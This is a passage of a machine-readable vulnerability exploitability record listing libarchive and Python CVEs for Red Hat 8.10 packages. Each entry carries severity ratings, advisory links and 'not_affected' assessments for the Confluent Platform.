          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5916",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5916"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5916"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5917",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5917"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5917"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2588"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5918",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5918"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2584"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-6069",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "The html.parser.HTMLParser class had worse-case quadratic complexity when processing certain crafted malformed inputs potentially leading to amplified denial-of-service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-6069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-6069"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-23342.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/python/cpython/commit/4455cbabf991e202185a25a631af206f60bbc949"
        },
        {
          "url": "https://github.com/python/cpython/commit/6eb6c5dbfb528bd07d77b60fd71fd05d81d45c41"
        },
        {
          "url": "https://github.com/python/cpython/commit/6eb6c5dbfb528bd07d77b60fd71fd05d81d45c41%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d1b3dfa09135affbbf27fb8babcf3c11415df49"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab0893fd5c579d9cea30841680e6d35fc478afb5"
        },
        {
          "url": "https://github.com/python/cpython/commit/d851f8e258c7328814943e923a7df81bca15df4b"
        },
        {
          "url": "https://github.com/python/cpython/commit/f3c6f882cddc8dc30320d2e73edf019e201394fc"
        },
        {
          "url": "https://github.com/python/cpython/commit/fdc9d214c01cb4588f540cfa03726bbf2a33fc15"
        },
        {
          "url": "https://github.com/python/cpython/issues/135462"
        },
        {
          "url": "https://github.com/python/cpython/pull/135464"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-6069.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/K5PIYLR6EP3WR7ZOKKYQUWEDNQVUXOYM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6069"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7710-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
        }
      ],
      "published": "2025-06-17T14:15:33+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
